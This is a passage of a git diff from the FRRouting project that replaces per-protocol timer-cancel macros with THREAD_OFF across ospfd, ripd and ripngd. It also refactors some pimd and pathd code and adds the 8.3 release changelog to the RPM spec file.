- OSPF_TIMER_OFF(ospf->t_maxage_walker);
- OSPF_TIMER_OFF(ospf->t_abr_task);
- OSPF_TIMER_OFF(ospf->t_asbr_check);
- OSPF_TIMER_OFF(ospf->t_asbr_nssa_redist_update);
- OSPF_TIMER_OFF(ospf->t_distribute_update);
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
- OSPF_TIMER_OFF(ospf->t_opaque_lsa_self);
- OSPF_TIMER_OFF(ospf->t_sr_update);
- OSPF_TIMER_OFF(ospf->t_default_routemap_timer);
- OSPF_TIMER_OFF(ospf->t_external_aggr);
- OSPF_TIMER_OFF(ospf->gr_info.t_grace_period);
+ THREAD_OFF(ospf->t_read);
+ THREAD_OFF(ospf->t_write);
+ THREAD_OFF(ospf->t_spf_calc);
+ THREAD_OFF(ospf->t_ase_calc);
+ THREAD_OFF(ospf->t_maxage);
+ THREAD_OFF(ospf->t_maxage_walker);
+ THREAD_OFF(ospf->t_abr_task);
+ THREAD_OFF(ospf->t_asbr_check);
+ THREAD_OFF(ospf->t_asbr_nssa_redist_update);
+ THREAD_OFF(ospf->t_distribute_update);
+ THREAD_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_opaque_lsa_self);
+ THREAD_OFF(ospf->t_sr_update);
+ THREAD_OFF(ospf->t_default_routemap_timer);
+ THREAD_OFF(ospf->t_external_aggr);
+ THREAD_OFF(ospf->gr_info.t_grace_period);
LSDB_LOOP (OPAQUE_AS_LSDB(ospf), rn, lsa)
ospf_discard_from_db(ospf, ospf->lsdb, lsa);
@@ -992,8 +992,8 @@ static void ospf_area_free(struct ospf_area *area)
free(IMPORT_NAME(area));
/* Cancel timer. */
- OSPF_TIMER_OFF(area->t_stub_router);
- OSPF_TIMER_OFF(area->t_opaque_lsa_self);
+ THREAD_OFF(area->t_stub_router);
+ THREAD_OFF(area->t_opaque_lsa_self);
if (OSPF_IS_AREA_BACKBONE(area))
area->ospf->backbone = NULL;
@@ -1428,7 +1428,7 @@ void ospf_ls_upd_queue_empty(struct ospf_interface *oi)
}
/* remove update event */
- thread_cancel(&oi->t_ls_upd_event);
+ THREAD_OFF(oi->t_ls_upd_event);
}
void ospf_if_update(struct ospf *ospf, struct interface *ifp)
@@ -1836,7 +1836,7 @@ int ospf_timers_refresh_set(struct ospf *ospf, int interval)
- (monotime(NULL) - ospf->lsa_refresher_started);
if (time_left > interval) {
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_lsa_refresher);
thread_add_timer(master, ospf_lsa_refresh_walker, ospf,
interval, &ospf->t_lsa_refresher);
}
@@ -1853,7 +1853,7 @@ int ospf_timers_refresh_unset(struct ospf *ospf)
- (monotime(NULL) - ospf->lsa_refresher_started);
if (time_left > OSPF_LSA_REFRESH_INTERVAL_DEFAULT) {
- OSPF_TIMER_OFF(ospf->t_lsa_refresher);
+ THREAD_OFF(ospf->t_lsa_refresher);
ospf->t_lsa_refresher = NULL;
thread_add_timer(master, ospf_lsa_refresh_walker, ospf,
OSPF_LSA_REFRESH_INTERVAL_DEFAULT,
@@ -1905,7 +1905,7 @@ static void ospf_nbr_nbma_delete(struct ospf *ospf,
static void ospf_nbr_nbma_down(struct ospf_nbr_nbma *nbr_nbma)
{
- OSPF_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
if (nbr_nbma->nbr) {
nbr_nbma->nbr->nbr_nbma = NULL;
@@ -2094,7 +2094,7 @@ int ospf_nbr_nbma_poll_interval_set(struct ospf *ospf, struct in_addr nbr_addr,
if (nbr_nbma->v_poll != interval) {
nbr_nbma->v_poll = interval;
if (nbr_nbma->oi && ospf_if_is_up(nbr_nbma->oi)) {
- OSPF_TIMER_OFF(nbr_nbma->t_poll);
+ THREAD_OFF(nbr_nbma->t_poll);
OSPF_POLL_TIMER_ON(nbr_nbma->t_poll, ospf_poll_timer,
nbr_nbma->v_poll);
}
@@ -2263,7 +2263,7 @@ static int ospf_vrf_disable(struct vrf *vrf)
if (IS_DEBUG_OSPF_EVENT)
zlog_debug("%s: ospf old_vrf_id %d unlinked", __func__,
old_vrf_id);
- thread_cancel(&ospf->t_read);
+ THREAD_OFF(ospf->t_read);
close(ospf->fd);
ospf->fd = -1;
}
diff --git a/ospfd/ospfd.h b/ospfd/ospfd.h
index 401a89fa38..8478c96ddc 100644
--- a/ospfd/ospfd.h
+++ b/ospfd/ospfd.h
@@ -647,8 +647,6 @@ struct ospf_nbr_nbma {
#define OSPF_TIMER_ON(T,F,V) thread_add_timer (master,(F),ospf,(V),&(T))
#define OSPF_AREA_TIMER_ON(T,F,V) thread_add_timer (master, (F), area, (V), &(T))
#define OSPF_POLL_TIMER_ON(T,F,V) thread_add_timer (master, (F), nbr_nbma, (V), &(T))
-#define OSPF_POLL_TIMER_OFF(X) OSPF_TIMER_OFF((X))
-#define OSPF_TIMER_OFF(X) thread_cancel(&(X))
/* Extern variables. */
extern struct ospf_master *om;
diff --git a/pathd/path_zebra.c b/pathd/path_zebra.c
index 156267a394..a98532cc39 100644
--- a/pathd/path_zebra.c
+++ b/pathd/path_zebra.c
@@ -352,3 +352,9 @@ void path_zebra_init(struct thread_master *master)
/* Connect to the LM. */
path_zebra_label_manager_connect();
}
+
+void path_zebra_stop(void)
+{
+ zclient_stop(zclient);
+ zclient_free(zclient);
+}
diff --git a/pathd/path_zebra.h b/pathd/path_zebra.h
index 42a7123dd4..683fcf10f7 100644
--- a/pathd/path_zebra.h
+++ b/pathd/path_zebra.h
@@ -30,5 +30,6 @@ void path_zebra_delete_sr_policy(struct srte_policy *policy);
int path_zebra_request_label(mpls_label_t label);
void path_zebra_release_label(mpls_label_t label);
void path_zebra_init(struct thread_master *master);
+void path_zebra_stop(void);
#endif /* _FRR_PATH_MPLS_H_ */
diff --git a/pathd/pathd.c b/pathd/pathd.c
index be2cfe8b01..e9d7cc6fc7 100644
--- a/pathd/pathd.c
+++ b/pathd/pathd.c
@@ -510,6 +510,8 @@ void srte_clean_zebra(void)
RB_FOREACH_SAFE (policy, srte_policy_head, &srte_policies, safe_pol)
srte_policy_del(policy);
+
+ path_zebra_stop();
}
/**
diff --git a/pimd/mtracebis_netlink.c b/pimd/mtracebis_netlink.c
index 47b5f7e52c..fe2cb56a26 100644
--- a/pimd/mtracebis_netlink.c
+++ b/pimd/mtracebis_netlink.c
@@ -187,16 +187,18 @@ int rtnl_dump_filter_l(struct rtnl_handle *rth,
const struct rtnl_dump_filter_arg *arg)
{
struct sockaddr_nl nladdr;
- struct iovec iov;
+ char buf[16384];
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = sizeof(buf),
+ };
struct msghdr msg = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
- char buf[16384];
- iov.iov_base = buf;
while (1) {
int status;
const struct rtnl_dump_filter_arg *a;
@@ -220,7 +222,7 @@ int rtnl_dump_filter_l(struct rtnl_handle *rth,
}
for (a = arg; a->filter; a++) {
- struct nlmsghdr *h = (struct nlmsghdr *)buf;
+ struct nlmsghdr *h = (struct nlmsghdr *)iov.iov_base;
msglen = status;
while (NLMSG_OK(h, (uint32_t)msglen)) {
@@ -348,7 +350,8 @@ int rtnl_talk(struct rtnl_handle *rtnl, struct nlmsghdr *n, pid_t peer,
msg.msg_namelen);
exit(1);
}
- for (h = (struct nlmsghdr *)buf; status >= (int)sizeof(*h);) {
+ for (h = (struct nlmsghdr *)iov.iov_base;
+ status >= (int)sizeof(*h);) {
int err;
int len = h->nlmsg_len;
int l = len - sizeof(*h);
@@ -421,21 +424,23 @@ int rtnl_listen(struct rtnl_handle *rtnl, rtnl_filter_t handler, void *jarg)
int status;
struct nlmsghdr *h;
struct sockaddr_nl nladdr;
- struct iovec iov;
+ char buf[8192];
+ struct iovec iov = {
+ .iov_base = buf,
+ .iov_len = sizeof(buf),
+ };
struct msghdr msg = {
.msg_name = &nladdr,
.msg_namelen = sizeof(nladdr),
.msg_iov = &iov,
.msg_iovlen = 1,
};
- char buf[8192];
memset(&nladdr, 0, sizeof(nladdr));
nladdr.nl_family = AF_NETLINK;
nladdr.nl_pid = 0;
nladdr.nl_groups = 0;
- iov.iov_base = buf;
while (1) {
iov.iov_len = sizeof(buf);
status = recvmsg(rtnl->fd, &msg, 0);
diff --git a/pimd/pim6_cmd.c b/pimd/pim6_cmd.c
index b7a832681d..d72a67243b 100644
--- a/pimd/pim6_cmd.c
+++ b/pimd/pim6_cmd.c
@@ -1309,6 +1309,25 @@ DEFPY (clear_ipv6_mroute_count,
return clear_ip_mroute_count_command(vty, name);
}
+DEFPY (clear_ipv6_pim_interfaces,
+ clear_ipv6_pim_interfaces_cmd,
+ "clear ipv6 pim [vrf NAME] interfaces",
+ CLEAR_STR
+ IPV6_STR
+ CLEAR_IP_PIM_STR
+ VRF_CMD_HELP_STR
+ "Reset PIM interfaces\n")
+{
+ struct vrf *v = pim_cmd_lookup(vty, vrf);
+
+ if (!v)
+ return CMD_WARNING;
+
+ clear_pim_interfaces(v->info);
+
+ return CMD_SUCCESS;
+}
+
DEFPY (clear_ipv6_pim_bsr_db,
clear_ipv6_pim_bsr_db_cmd,
"clear ipv6 pim [vrf NAME] bsr-data",
@@ -1599,6 +1618,7 @@ void pim_cmd_init(void)
install_element(ENABLE_NODE, &clear_ipv6_pim_oil_cmd);
install_element(ENABLE_NODE, &clear_ipv6_mroute_count_cmd);
install_element(ENABLE_NODE, &clear_ipv6_pim_bsr_db_cmd);
+ install_element(ENABLE_NODE, &clear_ipv6_pim_interfaces_cmd);
install_element(ENABLE_NODE, &debug_pimv6_cmd);
install_element(ENABLE_NODE, &debug_pimv6_nht_cmd);
diff --git a/pimd/pim_cmd.c b/pimd/pim_cmd.c
index f62b90a9d6..9681493808 100644
--- a/pimd/pim_cmd.c
+++ b/pimd/pim_cmd.c
@@ -1521,17 +1521,6 @@ static void clear_igmp_interfaces(struct pim_instance *pim)
pim_if_addr_add_all(ifp);
}
-static void clear_pim_interfaces(struct pim_instance *pim)
-{
- struct interface *ifp;
-
- FOR_ALL_INTERFACES (pim->vrf, ifp) {
- if (ifp->info) {
- pim_neighbor_delete_all(ifp, "interface cleared");
- }
- }
-}
-
static void clear_interfaces(struct pim_instance *pim)
{
clear_igmp_interfaces(pim);
@@ -1670,7 +1659,7 @@ DEFPY (clear_ip_mroute,
return CMD_SUCCESS;
}
-DEFUN (clear_ip_pim_interfaces,
+DEFPY (clear_ip_pim_interfaces,
clear_ip_pim_interfaces_cmd,
"clear ip pim [vrf NAME] interfaces",
CLEAR_STR
@@ -1679,13 +1668,12 @@ DEFUN (clear_ip_pim_interfaces,
VRF_CMD_HELP_STR
"Reset PIM interfaces\n")
{
- int idx = 2;
- struct vrf *vrf = pim_cmd_lookup_vrf(vty, argv, argc, &idx);
+ struct vrf *v = pim_cmd_lookup(vty, vrf);
- if (!vrf)
+ if (!v)
return CMD_WARNING;
- clear_pim_interfaces(vrf->info);
+ clear_pim_interfaces(v->info);
return CMD_SUCCESS;
}
diff --git a/pimd/pim_cmd_common.c b/pimd/pim_cmd_common.c
index f2974edae2..b7bd7375c5 100644
--- a/pimd/pim_cmd_common.c
+++ b/pimd/pim_cmd_common.c
@@ -4902,3 +4902,13 @@ int pim_show_interface_traffic_helper(const char *vrf, const char *if_name,
return CMD_SUCCESS;
}
+
+void clear_pim_interfaces(struct pim_instance *pim)
+{
+ struct interface *ifp;
+
+ FOR_ALL_INTERFACES (pim->vrf, ifp) {
+ if (ifp->info)
+ pim_neighbor_delete_all(ifp, "interface cleared");
+ }
+}
diff --git a/pimd/pim_cmd_common.h b/pimd/pim_cmd_common.h
index 1e770e6c8d..02acb16858 100644
--- a/pimd/pim_cmd_common.h
+++ b/pimd/pim_cmd_common.h
@@ -184,6 +184,7 @@ void pim_show_interface_traffic(struct pim_instance *pim, struct vty *vty,
bool uj);
int pim_show_interface_traffic_helper(const char *vrf, const char *if_name,
struct vty *vty, bool uj);
+void clear_pim_interfaces(struct pim_instance *pim);
/*
* Special Macro to allow us to get the correct pim_instance;
*/
diff --git a/pimd/pim_iface.c b/pimd/pim_iface.c
index 73b6ca951a..0fb5e8c6d9 100644
--- a/pimd/pim_iface.c
+++ b/pimd/pim_iface.c
@@ -801,22 +801,13 @@ void pim_if_addr_add_all(struct interface *ifp)
pim_if_addr_add(ifc);
}
- if (!v4_addrs && v6_addrs && !if_is_loopback(ifp)) {
- if (pim_ifp->pim_enable) {
-
- /* Interface has a valid primary address ? */
- if (!pim_addr_is_any(pim_ifp->primary_address)) {
-
- /* Interface has a valid socket ? */
- if (pim_ifp->pim_sock_fd < 0) {
- if (pim_sock_add(ifp)) {
- zlog_warn(
- "Failure creating PIM socket for interface %s",
- ifp->name);
- }
- }
- }
- } /* pim */
+ if (!v4_addrs && v6_addrs && !if_is_loopback(ifp) &&
+ pim_ifp->pim_enable && !pim_addr_is_any(pim_ifp->primary_address) &&
+ pim_ifp->pim_sock_fd < 0 && pim_sock_add(ifp)) {
+ /* Interface has a valid primary address ? */
+ /* Interface has a valid socket ? */
+ zlog_warn("Failure creating PIM socket for interface %s",
+ ifp->name);
}
/*
* PIM or IGMP is enabled on interface, and there is at least one
@@ -1768,9 +1759,7 @@ static int pim_ifp_down(struct interface *ifp)
if (ifp->info) {
pim_if_del_vif(ifp);
-#if PIM_IPV == 4
pim_ifstat_reset(ifp);
-#endif
}
return 0;
diff --git a/pimd/pim_nht.c b/pimd/pim_nht.c
index 2e5c0598c0..9feb064e96 100644
--- a/pimd/pim_nht.c
+++ b/pimd/pim_nht.c
@@ -436,7 +436,7 @@ static int pim_update_upstream_nh_helper(struct hash_bucket *bucket, void *arg)
* RPF nbr is now unreachable the MFC has already been updated
* by pim_rpf_clear
*/
- if (rpf_result != PIM_RPF_CHANGED)
+ if (rpf_result == PIM_RPF_CHANGED)
pim_upstream_mroute_iif_update(up->channel_oil, __func__);
if (rpf_result == PIM_RPF_CHANGED ||
diff --git a/redhat/frr.spec.in b/redhat/frr.spec.in
index 135c065b15..c94785ec01 100644
--- a/redhat/frr.spec.in
+++ b/redhat/frr.spec.in
@@ -795,7 +795,128 @@ sed -i 's/ -M rpki//' %{_sysconfdir}/frr/daemons
%changelog
-* Tue Jun 7 2022 Donatas Abraitis <donatas@opensourcerouting.org> - %{version}
+
+* Wed Jul 20 2022 Martin Winter <mwinter@opensourcerouting.org> - %{version}
+
+* Wed Jul 13 2022 Jafar Al-Gharaibeh <jafar@atcorp.com> - 8.3
+- General:
+- Add camelcase json keys in addition to pascalcase (Wrong JSON keys will be depracated)
+- Fix corruption when route-map delete/add sequence happens (fast re-add)
+- Reworked gRPC
+- RFC5424 & journald extended syslog target
+- bfdd:
+- Fix broken FSM in active/passive modes
+- bgpd:
+- Notification Message Support for BGP Graceful Restart (rfc8538)
+- BGP Cease Notification Subcode For BFD
+- Send Hold Timer for BGP (own implementation without an additional knob)
+- New `set as-path replace` command for BGP route-map
+- New `match peer` command for BGP route-map
+- New `ead-es-frag evi-limit` command for EVPN
+- New `match evpn route-type` command for EVPN route-map to match Type-1/Type-4
+- JSON outputs for all RPKI show commands
+- Set attributes via route-map for BGP conditional advertisements
+- Pass non-transitive extended communities between RS and RS-clients
+- Send MED attribute when aggregate prefix is created
+- Fix aspath memory leak in aggr_suppress_map_test
+- Fix crash for `show ip bgp vrf all all neighbors 192.168.0.1 ...`
+- Fix crash for `show ip bgp vrf all all`
+- Fix memory leak for BGP Community Alias in CLI
+- Fix memory leak when setting BGP community at egress
+- Fix memory leak when setting BGP large-community at egress
+- Fix SR color nexthop processing in BGP
+- Fix setting local-preference in route-map using +/-
+- Fix crash using Lua and route-map to set attributes via scripts
+- Fix crash when issuing various forms of `bgp no-rib`
+- isisd:
+- JSON output for show summary command
+- Fix crash when MTU mismatch occurs
+- Fix crash with xfrm interface type
+- Fix infinite loop when parsing LSPs
+- Fix router capability TLV parsing issues
+- vtysh:
+- New `show thread timers` command
+- ospfd6:
+- Add LSA statistics to LSA database
+- Add LSA stats to `show area json` output
+- Show time left in hello timer for `show ipv6 ospf6 int`
+- Restart SPF when distance is updated
+- Support keychain for ospf6 authentication
+- ospfd:
+- New `show ip ospf reachable-routers` command
+- Restart SPF when distance is updated
+- Use consistent JSON keys for `show ip ospf neighbor` and detail version
+- pimd:
+- Add additional IGMP stats
+- Add IGMP join sent/failed statistics
+- Add IGMP total groups and total source groups to statistics
+- New `debug igmp trace detail` command
+- New `ip pim passive` command
+- JSON support added for command `show ip igmp sources`
+- Allow the LPM match work properly with prefix lists and normal RPs
+- Do not allow 224.0.0.0/24 range in IGMP join
+- Fix IGMP packet/query check
+- Handle PIM join/prune receive flow for IPv6
+- Handle receive of (*,G) register stop with source address as 0
+- Handle of exclude mode IGMPv3 report messages for SSM-aware group
+- Handle of IGMPv2 report message for SSM-aware group range
+- Send immediate join with possible sg rpt prune bit set
+- Show group-type under `show ip pim rp-info`
+- Show total received messages IGMP stats
+- staticd:
+- Capture zebra advertised ECMP limit
+- Do not register existing nexthop to Zebra
+- Reject route config with too many nexthops
+- Track nexthops per-safi
+- watchfrr:
+- Add some more information to `show watchfrr`
+- Send operational state to systemd
+- zebra:
+- Add ability to know when FRR is not ASIC offloaded
+- Add command for setting protodown bit
+- Add dplane type for netconf data
+- Add ECMP supported to `show zebra`
+- Add EVPN status to `show zebra`
+- Add if v4/v6 forwarding is turned on/off to `show zebra`
+- Add initial zebra tracepoint support
+- Add kernel nexthop group support to `show zebra`
+- Add knowledge about ra and rfc 5549 to `show zebra`
+- Add mpls status to `show zebra`
+- Add netlink debug dump for netconf messages
+- Add netlink debugs for ip rules
+- Add OS and version to `show zebra`
+- Add support for end.dt4
+- Add to `show zebra` the type of vrf devices being used
+- Allow *BSD to specify a receive buffer size
+- Allow multiple connected routes to be choosen for kernel routes
+- Allow system routes to recurse through themselves
+- Do not send RAs w/o link-local v6 or on bridge-ports
+- Evpn disable remove l2vni from l3vni list
+- Evpn-mh bonds protodown check for set
+- Evpn-mh use protodown update reason api
+- Fix cleanup of meta queues on vrf disable
+- Fix crash in evpn neigh cleanup all
+- Fix missing delete vtep during vni transition
+- Fix missing vrf change of l2vni on vxlan interface
+- Fix rtadv startup when config read in is before interface up
+- Fix use after deletion event in FreeBSD
+- Fix v6 route replace failure turned into success
+- Get zebra graceful restart working when restarting on *BSD
+- Handle FreeBSD routing socket enobufs
+- Handle protodown netlink for vxlan device
+- Include mpls enabled status in interface output
+- Include old reason in evpn-mh bond update
+- Keep the interface flags safe on multiple ioctl calls
+- Let /32 host route with same ip cross vrf
+- Make router advertisement warnings show up once every 6 hours
+- Prevent crash if zebra_route_all is used for a route type
+- Prevent installation of connected multiple times
+- Protodown-up event trigger interface up
+- Register nht nexthops with proper safi
+- Update advertise-svi-ip macips w/ new mac
+- When handling unprocessed messages from kernel print usable string
+- New `show ip nht mrib` command
+- Handle ENOBUFS errors for FreeBSD
* Tue Mar 1 2022 Jafar Al-Gharaibeh <jafar@atcorp.com> - 8.2
- The FRRouting community would like to announce FRR Release 8.2.
diff --git a/ripd/rip_interface.c b/ripd/rip_interface.c
index 7ac37b7ee2..02da56e4f3 100644
--- a/ripd/rip_interface.c
+++ b/ripd/rip_interface.c
@@ -428,7 +428,7 @@ static void rip_interface_clean(struct rip_interface *ri)
ri->enable_interface = 0;
ri->running = 0;
- thread_cancel(&ri->t_wakeup);
+ THREAD_OFF(ri->t_wakeup);
}
void rip_interfaces_clean(struct rip *rip)
diff --git a/ripd/rip_nb_rpcs.c b/ripd/rip_nb_rpcs.c
index 52f2985cb3..25641f2f79 100644
--- a/ripd/rip_nb_rpcs.c
+++ b/ripd/rip_nb_rpcs.c
@@ -64,8 +64,8 @@ static void clear_rip_route(struct rip *rip)
}
if (rinfo) {
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
rip_info_free(rinfo);
}
diff --git a/ripd/rip_peer.c b/ripd/rip_peer.c
index 8febb436e7..a52914bcf9 100644
--- a/ripd/rip_peer.c
+++ b/ripd/rip_peer.c
@@ -38,7 +38,7 @@ static struct rip_peer *rip_peer_new(void)
static void rip_peer_free(struct rip_peer *peer)
{
- RIP_TIMER_OFF(peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
XFREE(MTYPE_RIP_PEER, peer);
}
@@ -84,7 +84,7 @@ static struct rip_peer *rip_peer_get(struct rip *rip, struct in_addr *addr)
peer = rip_peer_lookup(rip, addr);
if (peer) {
- thread_cancel(&peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
} else {
peer = rip_peer_new();
peer->rip = rip;
diff --git a/ripd/ripd.c b/ripd/ripd.c
index cc21c0bd69..9798186036 100644
--- a/ripd/ripd.c
+++ b/ripd/ripd.c
@@ -144,7 +144,7 @@ static void rip_garbage_collect(struct thread *t)
rinfo = THREAD_ARG(t);
/* Off timeout timer. */
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Get route_node pointer. */
rp = rinfo->rp;
@@ -226,14 +226,14 @@ struct rip_info *rip_ecmp_replace(struct rip *rip, struct rip_info *rinfo_new)
if (tmp_rinfo == rinfo)
continue;
- RIP_TIMER_OFF(tmp_rinfo->t_timeout);
- RIP_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
rip_info_free(tmp_rinfo);
}
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, rinfo_new, sizeof(struct rip_info));
if (rip_route_rte(rinfo)) {
@@ -262,12 +262,12 @@ struct rip_info *rip_ecmp_delete(struct rip *rip, struct rip_info *rinfo)
struct route_node *rp = rinfo->rp;
struct list *list = (struct list *)rp->info;
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
if (listcount(list) > 1) {
/* Some other ECMP entries still exist. Just delete this entry.
*/
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
if (rip_route_rte(rinfo)
&& CHECK_FLAG(rinfo->flags, RIP_RTF_FIB))
@@ -313,7 +313,7 @@ static void rip_timeout(struct thread *t)
static void rip_timeout_update(struct rip *rip, struct rip_info *rinfo)
{
if (rinfo->metric != RIP_METRIC_INFINITY) {
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
thread_add_timer(master, rip_timeout, rinfo, rip->timeout_time,
&rinfo->t_timeout);
}
@@ -659,8 +659,8 @@ static void rip_rte_process(struct rte *rte, struct sockaddr_in *from,
assert(newinfo.metric
!= RIP_METRIC_INFINITY);
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
memcpy(rinfo, &newinfo,
sizeof(struct rip_info));
rip_timeout_update(rip, rinfo);
@@ -1614,7 +1614,7 @@ void rip_redistribute_delete(struct rip *rip, int type, int sub_type,
RIP_TIMER_ON(rinfo->t_garbage_collect,
rip_garbage_collect,
rip->garbage_time);
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
rinfo->flags |= RIP_RTF_CHANGED;
if (IS_RIP_DEBUG_EVENT)
@@ -2506,7 +2506,7 @@ static void rip_update(struct thread *t)
/* Triggered updates may be suppressed if a regular update is due by
the time the triggered update would be sent. */
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_triggered_interval);
rip->trigger = 0;
/* Register myself. */
@@ -2553,7 +2553,7 @@ static void rip_triggered_update(struct thread *t)
int interval;
/* Cancel interval timer. */
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_triggered_interval);
rip->trigger = 0;
/* Logging triggered update. */
@@ -2603,7 +2603,7 @@ void rip_redistribute_withdraw(struct rip *rip, int type)
rinfo->metric = RIP_METRIC_INFINITY;
RIP_TIMER_ON(rinfo->t_garbage_collect, rip_garbage_collect,
rip->garbage_time);
- RIP_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
rinfo->flags |= RIP_RTF_CHANGED;
if (IS_RIP_DEBUG_EVENT) {
@@ -2785,7 +2785,7 @@ void rip_event(struct rip *rip, enum rip_event event, int sock)
thread_add_read(master, rip_read, rip, sock, &rip->t_read);
break;
case RIP_UPDATE_EVENT:
- RIP_TIMER_OFF(rip->t_update);
+ THREAD_OFF(rip->t_update);
jitter = rip_update_jitter(rip->update_time);
thread_add_timer(master, rip_update, rip,
sock ? 2 : rip->update_time + jitter,
@@ -2915,8 +2915,8 @@ void rip_ecmp_disable(struct rip *rip)
if (tmp_rinfo == rinfo)
continue;
- RIP_TIMER_OFF(tmp_rinfo->t_timeout);
- RIP_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
+ THREAD_OFF(tmp_rinfo->t_garbage_collect);
list_delete_node(list, node);
rip_info_free(tmp_rinfo);
}
@@ -3508,8 +3508,8 @@ static void rip_instance_disable(struct rip *rip)
rip_zebra_ipv4_delete(rip, rp);
for (ALL_LIST_ELEMENTS_RO(list, listnode, rinfo)) {
- RIP_TIMER_OFF(rinfo->t_timeout);
- RIP_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
rip_info_free(rinfo);
}
list_delete(&list);
@@ -3521,12 +3521,12 @@ static void rip_instance_disable(struct rip *rip)
rip_redistribute_disable(rip);
/* Cancel RIP related timers. */
- RIP_TIMER_OFF(rip->t_update);
- RIP_TIMER_OFF(rip->t_triggered_update);
- RIP_TIMER_OFF(rip->t_triggered_interval);
+ THREAD_OFF(rip->t_update);
+ THREAD_OFF(rip->t_triggered_update);
+ THREAD_OFF(rip->t_triggered_interval);
/* Cancel read thread. */
- thread_cancel(&rip->t_read);
+ THREAD_OFF(rip->t_read);
/* Close RIP socket. */
close(rip->sock);
diff --git a/ripd/ripd.h b/ripd/ripd.h
index f26dcd8775..d26592dac2 100644
--- a/ripd/ripd.h
+++ b/ripd/ripd.h
@@ -404,9 +404,6 @@ enum rip_event {
/* Macro for timer turn on. */
#define RIP_TIMER_ON(T,F,V) thread_add_timer (master, (F), rinfo, (V), &(T))
-/* Macro for timer turn off. */
-#define RIP_TIMER_OFF(X) thread_cancel(&(X))
-
#define RIP_OFFSET_LIST_IN 0
#define RIP_OFFSET_LIST_OUT 1
#define RIP_OFFSET_LIST_MAX 2
diff --git a/ripngd/ripng_interface.c b/ripngd/ripng_interface.c
index 5159a9825b..3068d04b73 100644
--- a/ripngd/ripng_interface.c
+++ b/ripngd/ripng_interface.c
@@ -316,7 +316,7 @@ void ripng_interface_clean(struct ripng *ripng)
ri->enable_interface = 0;
ri->running = 0;
- thread_cancel(&ri->t_wakeup);
+ THREAD_OFF(ri->t_wakeup);
}
}
diff --git a/ripngd/ripng_nb_rpcs.c b/ripngd/ripng_nb_rpcs.c
index 4dfe9d9640..57a5f26688 100644
--- a/ripngd/ripng_nb_rpcs.c
+++ b/ripngd/ripng_nb_rpcs.c
@@ -66,8 +66,8 @@ static void clear_ripng_route(struct ripng *ripng)
}
if (rinfo) {
- RIPNG_TIMER_OFF(rinfo->t_timeout);
- RIPNG_TIMER_OFF(rinfo->t_garbage_collect);
+ THREAD_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_garbage_collect);
listnode_delete(list, rinfo);
ripng_info_free(rinfo);
}
diff --git a/ripngd/ripng_peer.c b/ripngd/ripng_peer.c
index 010fdda89e..37cfe9833f 100644
--- a/ripngd/ripng_peer.c
+++ b/ripngd/ripng_peer.c
@@ -43,7 +43,7 @@ static struct ripng_peer *ripng_peer_new(void)
static void ripng_peer_free(struct ripng_peer *peer)
{
- RIPNG_TIMER_OFF(peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
XFREE(MTYPE_RIPNG_PEER, peer);
}
@@ -93,7 +93,7 @@ static struct ripng_peer *ripng_peer_get(struct ripng *ripng,
peer = ripng_peer_lookup(ripng, addr);
if (peer) {
- thread_cancel(&peer->t_timeout);
+ THREAD_OFF(peer->t_timeout);
} else {
peer = ripng_peer_new();
peer->ripng = ripng;
diff --git a/ripngd/ripngd.c b/ripngd/ripngd.c
index e7d2928697..1e7a13d7dc 100644
--- a/ripngd/ripngd.c
+++ b/ripngd/ripngd.c
@@ -431,7 +431,7 @@ static void ripng_garbage_collect(struct thread *t)
rinfo = THREAD_ARG(t);
/* Off timeout timer. */
- RIPNG_TIMER_OFF(rinfo->t_timeout);
+ THREAD_OFF(rinfo->t_timeout);
/* Get route_node pointer. */
rp = rinfo->rp;
@@ -518,14 +518,14 @@ struct ripng_info *ripng_ecmp_replace(struct ripng *ripng,
/* Re-use the first entry, and delete the others. */
for (ALL_LIST_ELEMENTS(list, node, nextnode, tmp_rinfo))
if (tmp_rinfo != rinfo) {
- RIPNG_TIMER_OFF(tmp_rinfo->t_timeout);
- RIPNG_TIMER_OFF(tmp_rinfo->t_garbage_collect);
+ THREAD_OFF(tmp_rinfo->t_timeout);
